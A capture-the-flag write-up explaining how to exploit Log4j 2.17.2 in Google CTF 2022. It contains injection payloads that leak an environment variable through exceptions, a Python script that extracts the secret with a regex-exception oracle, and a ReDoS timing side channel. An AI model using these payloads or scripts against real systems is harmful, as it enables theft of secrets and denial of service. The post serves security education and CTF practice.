This blog post explains three ways to exploit Log4j 2.17.2 from Google CTF 2022:
- Level 1: Trigger an exception in Log4j that contains the flag
- Level 2: Guessing the flag with the help of RegEx conversion patterns
- Bonus: Guessing the flag with a time-based side channel using ReDoS
The bonus was not necessary to solve the challenge but fun to code ;)
There is a chatbot interface at https://log4j-web.2022.ctfcompetition.com/
When looking into the source code, we see the following:
- Python 3.8.10 running a Flask web server in the frontend
- Java 11.0.15 in the backend with Log4j 2.17.2
  - In this version JNDI lookups are disabled by default and Log4Shell is not exploitable
- A Dockerfile with nsjail process isolation wiring the two
  - The process isolation is just for hosting the CTF and not relevant for the challenge
- We identified the versions by running the Docker container and looking into `pom.xml`
$ tree -L 2
.
├── chatbot
│ ├── pom.xml
│ └── src
├── server
│ ├── app.py
│ ├── requirements.txt
│ └── templates
├── Dockerfile
├── kctf
├── nsjail.cfg
└── start.sh
@app.route("/", methods=['GET', 'POST'])
def start():
    if request.method == 'POST':
        text = request.form['text'].split(' ')
        cmd = ''
        if len(text) < 1:
            return ('invalid message', 400)
        elif len(text) < 2:
            cmd = text[0]
            text = ''
        else:
            cmd, text = text[0], ' '.join(text[1:])
        result = chat(cmd, text)
        return result
    return render_template('index.html')
- `GET /` will serve the `index.html` and show the interface
- `POST /` with a `text` payload will be split by spaces
  - The first part is interpreted as the `cmd`
  - The remaining parts are the arguments `text`
  - Next, these are passed on to `chat(cmd, text)`
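The splitting rule above can be tried in isolation. The following is a minimal sketch that copies the branch logic from `start()` into a standalone helper; the name `split_message` is made up for illustration and is not part of the challenge code.

```python
def split_message(raw):
    """Mirror how start() derives cmd and text from the submitted form field."""
    parts = raw.split(' ')
    if len(parts) < 1:
        # Unreachable in practice: str.split(' ') always returns at least one item.
        raise ValueError('invalid message')
    if len(parts) < 2:
        return parts[0], ''
    return parts[0], ' '.join(parts[1:])


print(split_message('/repeat hello world'))
print(split_message('${env:FLAG}'))
```

Note that a payload without spaces ends up entirely in `cmd`, which is the value that matters later.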
The backend is called by starting a Java process like so:
def chat(cmd, text):
    # run java jar with a 10 second timeout
    res = subprocess.run(['java', '-jar', \
                          '-Dcmd=' + cmd, \
                          'chatbot/target/app-1.0-SNAPSHOT.jar', \
                          '--', text], \
                         capture_output=True, timeout=10)
    print(res.stderr.decode('utf8'))
    return res.stdout.decode('utf-8')
We note the following:
- The process is called properly (no `shell=True`, arguments are passed as a list)
- The `cmd` is passed as a system property to Java
- All the `text` is passed as one single argument (may contain spaces)
- `stderr` is printed to the console (and not visible in the frontend)
- `stdout` is returned (and shown in the frontend)
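To see why the list form matters, here is a small sketch that rebuilds the argument vector the same way `chat()` does, without starting Java. `build_argv` is a hypothetical helper introduced only for this illustration.

```python
def build_argv(cmd, text):
    """Rebuild the argument list that chat() hands to subprocess.run."""
    return ['java', '-jar',
            '-Dcmd=' + cmd,
            'chatbot/target/app-1.0-SNAPSHOT.jar',
            '--', text]


argv = build_argv('${env:FLAG}', 'a b; echo pwned')
for index, arg in enumerate(argv):
    print(index, repr(arg))
```

Spaces and shell metacharacters stay inside a single list element, so there is no command injection here. The interesting attacker-controlled value is the `cmd` system property.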
public static void main(String[] args) {
    String flag = System.getenv("FLAG");
    if (flag == null || !flag.startsWith("CTF")) {
        LOGGER.error("{}", "Contact admin");
    }
    LOGGER.info("msg: {}", args);
    // TODO: implement bot commands
    String cmd = System.getProperty("cmd");
    if (cmd.equals("help")) {
        doHelp();
        return;
    }
    if (!cmd.startsWith("/")) {
        System.out.println("The command should start with a /.");
        return;
    }
    doCommand(cmd.substring(1), args);
}
We note the following:
- The flag is hidden in the environment variable `FLAG`
- The `LOGGER.info` call is the only Log4j call on the normal path (the `LOGGER.error` call only fires when the flag is missing)
  - It will print the full arguments, but not the command
  - The way that arguments are passed from Python, there will only ever be zero or one argument. But, this argument may contain spaces.
- The command is fetched from the system property `cmd`
  - Commands must start with a `/`, except for `help`
- Next, the command and the arguments are passed to `doCommand(cmd.substring(1), args)`
private static void doCommand(String cmd, String[] args) {
    switch(cmd) {
        case "help":
            doHelp();
            break;
        case "repeat":
            System.out.println(args[1]);
            break;
        case "time":
            DateTimeFormatter dtf = DateTimeFormatter.ofPattern("yyyy/M/d H:m:s");
            System.out.println(dtf.format(LocalDateTime.now()));
            break;
        case "wc":
            if (args[1].isEmpty()) {
                System.out.println(0);
            } else {
                System.out.println(args[1].split(" ").length);
            }
            break;
        default:
            System.out.println("Sorry, you must be a premium member in order to run this command.");
    }
}
We finally see the available commands:
- `help` or `/help` just prints a help message
- `/repeat` will print the first (and only) argument to `stdout`
- `/time` will print the current time
- `/wc` will print the number of space-separated words in the argument
None of these will invoke Log4j! So, we can't inject anything via the arguments!
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
  <Appenders>
    <Console name="Console" target="SYSTEM_ERR">
      <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
      </PatternLayout>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="debug">
      <AppenderRef ref="Console"/>
    </Root>
  </Loggers>
</Configuration>
This configures how Log4j will behave:
- Logs are written to `stderr` (remember, we don't collect that in the Python frontend)
- The system properties lookup `${sys:cmd}` prints the `cmd` property in every log line
- Afterwards, `%msg` holds the message, followed by a line break `%n`
Our `cmd` is passed as-is to the Java process and injected into the pattern layout:
%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n
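As a rough mental model (an assumption for illustration, not how Log4j is implemented internally), the substitution can be pictured as a plain string replacement that happens before the layout is interpreted. The helper name `effective_pattern` is made up.

```python
LAYOUT = "%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n"


def effective_pattern(cmd):
    """Toy model: paste the attacker-controlled cmd into the pattern layout."""
    return LAYOUT.replace("${sys:cmd}", cmd)


print(effective_pattern("/time"))
print(effective_pattern("%oops"))
```

Whatever we send as `cmd` becomes part of the pattern itself, which is why conversion patterns and lookups placed in it get interpreted.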
Log4j still has environment lookups which could enable us to read the flag via `${env:FLAG}`.
A first try would be to inject this as the `cmd`.
This will print the `FLAG` to `stderr` on the backend, but sadly this is not captured by the frontend.
09:10:12.598 INFO com.google.app.App executing CTF{1234} - msg: --
We may also inject new conversion patterns and trigger exceptions that will be logged to `stdout`.
Let's give the invalid `%oops` pattern a try.
Log4j will resolve patterns recursively so that we can combine conversion patterns and environment lookups. This will also trigger an exception, but the exception does not leak the resolved environment lookup. Yet.
We now know what we want to look out for:
- A lookup or combination of lookups that triggers an exception
- The exception must leak parts of its arguments
Luckily, Log4j has plenty of lookups and conversion patterns available for us.
Digging deeper into the source code of Log4j, we find the Java lookup that does things like `${java:version}`.
However, if we give it a key it does not know, we will get an `IllegalArgumentException` that leaks the argument.
@Override
public String lookup(final LogEvent event, final String key) {
    switch (key) {
        case "version":
            return "Java version " + getSystemProperty("java.version");
        case "runtime":
            return getRuntime();
        case "vm":
            return getVirtualMachine();
        case "os":
            return getOperatingSystem();
        case "hw":
            return getHardware();
        case "locale":
            return getLocale();
        default:
            throw new IllegalArgumentException(key);
    }
}
So, let's give this one a try then:
${java:${env:FLAG}}
Awesome, we got the flag CTF{d95528534d14dc6eb6aeb81c994ce8bd}
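The leak can be reproduced with a toy model in Python. This is only a sketch of the idea: `java_lookup` and `resolve` are simplified stand-ins written for this post, the flag value is a placeholder, and real Log4j resolves lookups through its own substitutor.

```python
import re

ENV = {"FLAG": "CTF{placeholder}"}  # placeholder value, not the real flag


def java_lookup(key):
    """Stand-in for the Java lookup: unknown keys raise and echo the key."""
    known = {"version": "Java version 11.0.15"}
    if key not in known:
        raise ValueError(key)
    return known[key]


def resolve(expr):
    """Resolve the inner ${env:...} first, then the outer ${java:...}."""
    expr = re.sub(r"\$\{env:(\w+)\}", lambda m: ENV[m.group(1)], expr)
    return re.sub(r"\$\{java:(.*)\}", lambda m: java_lookup(m.group(1)), expr)


try:
    resolve("${java:${env:FLAG}}")
except ValueError as exc:
    print("exception message:", exc)
```

Because the inner lookup is resolved first, the outer lookup receives the flag as its key and echoes it in the exception message.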
There is another chatbot interface at https://log4j2-web.2022.ctfcompetition.com/
This is the second level of the challenge, where the authors only tell us that the code has been changed slightly.
Probably, they catch exceptions or even avoid printing out the `FLAG` when it is seen in `stdout`.
We need an attack vector that can guess the flag without printing it.
For example, we would like to ask questions like "does the flag start with `CTF{a`?".
And we need a way to differentiate a "yes" from a "no" to this question.
With that, we could guess the full flag character-by-character.
Log4j doesn't have any conversion patterns or lookups that let us do a "string contains" or "string starts with". But, Log4j allows for RegEx substitution with the following pattern:
%replace{pattern}{regex}{substitution}
Consider this input now:
%replace{${env:FLAG}}{^CTX.*}{${error}}
This will yield `The command should start with a /.`
- Why? Before the RegEx is evaluated, `${env:FLAG}` is replaced with the flag. Then, the RegEx pattern is tested on the flag and does not match because the flag does not start with `CTX`. Nothing is replaced by this pattern; only the actual flag is printed to `stderr` as before (but we don't see it). Since the command does not start with a `/`, the app tells us so.
Now consider this input:
%replace{${env:FLAG}}{^CTF.*}{${error}}
This will yield `Sensitive information detected in output. Censored for security reasons.`
- Why? The pattern does match now (because the flag starts with `CTF`), so the entire flag is replaced by `${error}`. The term `${error}` is a back-reference to a named capturing group and NOT a Log4j lookup. This named capturing group does not exist, so the replacement throws an exception. We know that exceptions are silenced and replaced with the "sensitive information" text.
The actual exception that we trigger in the backend looks like this:
2022-07-08 12:57:32,788 main ERROR An exception occurred processing Appender Console java.lang.IllegalArgumentException: No group with name {error}
at java.util.regex.Matcher.appendReplacement(Matcher.java:849)
at java.util.regex.Matcher.replaceAll(Matcher.java:955)
at org.apache.logging.log4j.core.pattern.RegexReplacementConverter.format(RegexReplacementConverter.java:95)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:44)
...
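The match-dependent exception can be modelled offline. The sketch below imitates the behaviour described above in Python: the replacement is only inspected when the regex matches, and a reference to a missing named group then raises. `java_like_replace` and `oracle` are hypothetical helpers, and Python's `re` stands in for `java.util.regex`, so this is an approximation rather than the real code path.

```python
import re


def java_like_replace(text, regex, replacement):
    """Imitate replaceAll: the replacement is only looked at when regex matches."""
    compiled = re.compile(regex)
    if compiled.search(text) is None:
        return text  # no match: the bad group reference is never touched
    ref = re.fullmatch(r"\$\{(\w+)\}", replacement)
    if ref and ref.group(1) not in compiled.groupindex:
        raise ValueError("No group with name {" + ref.group(1) + "}")
    return compiled.sub(lambda m: replacement, text)


def oracle(flag, regex):
    """True if the regex matches the flag, signalled only by the exception."""
    try:
        java_like_replace(flag, regex, "${error}")
        return False
    except ValueError:
        return True


print(oracle("CTF{placeholder}", "^CTF.*"))
print(oracle("CTF{placeholder}", "^CTX.*"))
```

The flag never appears in the output; the only thing that changes is whether an exception occurred, which is exactly one bit of information per request.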
We can use this to binary-search for the flag.
We use hexadecimal escapes to easily search the entire printable ASCII space.
The following snippet is looking for `\x43\x54\x46` (CTF) followed by `[\x61-\x7a]` (a-z).
This also makes it easy to search for special characters without caring about escaping them.
%replace{${env:FLAG}}{^\x43\x54\x46[\x61-\x7a]}{${error}}
Find the full algorithm below.
import requests


def int2hex(num):
    # transforms 65 to '\x41'
    return f"\\x{num:02x}"


def str2hex(text):
    # transforms 'hello' to '\x68\x65\x6c\x6c\x6f'
    return "".join(map(int2hex, map(ord, text)))


def get_regex(prefix, lo, hi):
    # matches if the flag starts with prefix followed by a character in [lo, hi]
    check = "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
    return "%replace{${env:FLAG}}{^" + str2hex(prefix) + check + "}{${error}}"


def test_pattern(pattern, endpoint):
    # triggers an exception if the regex pattern matches
    response = requests.post(endpoint, data=dict(text=pattern))
    return "ERROR" in response.text or "Censored" in response.text


def binary_search(prefix, lo, hi, test_range):
    # binary search with minimum number of comparisons
    while lo != hi:
        mid = (lo + hi) // 2
        if test_range(prefix, lo, mid):
            hi = mid
        else:
            lo = mid + 1
    # confirm the remaining candidate; fails once the flag is complete
    if test_range(prefix, lo, lo):
        return lo
    return None


def solve(endpoint):
    def test_range(prefix, lo, hi):
        print(f" => {prefix} [{chr(lo)}-{chr(hi)}]", end="\r")
        pattern = get_regex(prefix, lo, hi)
        return test_pattern(pattern, endpoint)

    flag = "CTF"
    while True:
        # search all printable ASCII characters
        match = binary_search(flag, 0x20, 0x7E, test_range)
        if match is None:
            # no character extends the prefix, so the flag is complete
            return flag
        flag += chr(match)


print(solve("https://log4j2-web.2022.ctfcompetition.com/"))
# CTF{and-you-thought-it-was-over-didnt-you}
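The search can be dry-run without touching the CTF server. The following sketch swaps the HTTP request for a local stand-in oracle that checks a made-up secret with Python's `re`; `SECRET`, `local_oracle`, and `recover` are assumptions for this illustration, and the search loop is re-implemented so the block runs on its own.

```python
import re

SECRET = "CTF{local-test-flag}"  # made-up secret for the dry run


def int2hex(num):
    return f"\\x{num:02x}"


def str2hex(text):
    return "".join(int2hex(ord(ch)) for ch in text)


def local_oracle(prefix, lo, hi):
    """Answer 'is the next character in [lo, hi]?' like the server-side check."""
    regex = "^" + str2hex(prefix) + "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
    return re.search(regex, SECRET) is not None


def recover(oracle, known="CTF"):
    """Extend the known prefix one character at a time via binary search."""
    queries = 0
    while True:
        lo, hi = 0x20, 0x7E
        while lo != hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(known, lo, mid):
                hi = mid
            else:
                lo = mid + 1
        queries += 1
        if not oracle(known, lo, lo):
            return known, queries  # nothing extends the prefix: done
        known += chr(lo)


flag, queries = recover(local_oracle)
print(flag, "recovered with", queries, "oracle calls")
```

With 95 printable characters, each position costs six or seven range checks plus one confirmation, so the number of requests grows linearly with the flag length.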
Did you look closely at the Python source code?
def chat(cmd, text):
    # run java jar with a 10 second timeout
    res = subprocess.run(['...'], capture_output=True, timeout=10)
You might think it's just good practice to have a timeout here. But I see a new attack vector arising from it: with RegEx, one can craft patterns and inputs that effectively never finish evaluating because of exponential backtracking.
In level 2, we found an expression that returns different outputs when asked whether the flag starts with a certain substring. But there is one additional "output" available: the response time.
Try the following input on the chatbot (without the line breaks):
%replace{
hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh
ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc
hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc
cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic
chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic
ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}
{(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*}
{match}
You won't get an answer. This pattern and input will never finish on any JDK. We took it from the SonarLint rule RSPEC-2631. While this is often just seen as a DoS attack vector, it may also be used to extract data.
Consider the following input:
%replace{${env:FLAG}.
hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh
ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc
hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc
cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic
chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic
ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}
{(CTF[a-z].*|(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*)}
{match}
For the input, we prepended the flag.
For the pattern, we use an alternation, where the first alternative is `CTF[a-z].*` and the second alternative is the one that will time out.
If the flag starts with `CTF[a-z]`, this pattern will match immediately.
The first alternative will match and there is no need for the RegEx engine to try the second one.
However, if the flag does not start with `CTF[a-z]`, the second alternative will be evaluated.
And this second one will then time out.
Thus, judging by the response time alone, we can test for any flag prefix.
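The timing effect itself can be observed locally. The sketch below is an assumption-laden miniature: it uses Python's `re` rather than `java.util.regex`, and the textbook pattern `(a+)+$` in place of the SonarSource one, with a short filler so the slow case should take a noticeable moment instead of hanging. `timed_probe` is a hypothetical helper.

```python
import re
import time

FILLER = "a" * 20 + "!"  # input that makes (a+)+$ backtrack heavily


def timed_probe(secret, guess):
    """Return seconds spent testing whether secret starts with the guess regex."""
    text = secret + "." + FILLER
    # fast alternative first, slow backtracking alternative second
    pattern = "^" + guess + ".*|(a+)+$"
    start = time.perf_counter()
    re.search(pattern, text)
    return time.perf_counter() - start


fast = timed_probe("CTF{placeholder}", "CTF[{]")
slow = timed_probe("CTF{placeholder}", "CTX[{]")
print(f"matching prefix: {fast:.4f}s, wrong prefix: {slow:.4f}s")
```

The real attack works the same way, except that the slow branch runs into the ten-second timeout of `subprocess.run`.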
Replace the `get_regex` and `test_pattern` methods from before with the following:
def get_regex(prefix, lo, hi):
    check = "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
    # https://rules.sonarsource.com/java/RSPEC-2631
    return (
        "%replace{${env:FLAG}."
        "hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh"
        "ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc"
        "hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc"
        "cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic"
        "chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic"
        "ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}"
        "{(" + str2hex(prefix) + check + ".*|"
        "(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*)}{MATCH}"
    )


def test_pattern(pattern, endpoint):
    # only times out if the regex pattern does not match
    response = requests.post(endpoint, data=dict(text=pattern))
    return response.ok
Because of the timeout in the Python code, we get either an immediate response (the RegEx matched) or, after ten seconds, a 500 server error (it did not). While this method takes much longer, it doesn't rely on any output whatsoever, which makes it quite dangerous.
And this is why you should not put secrets in your environment variables.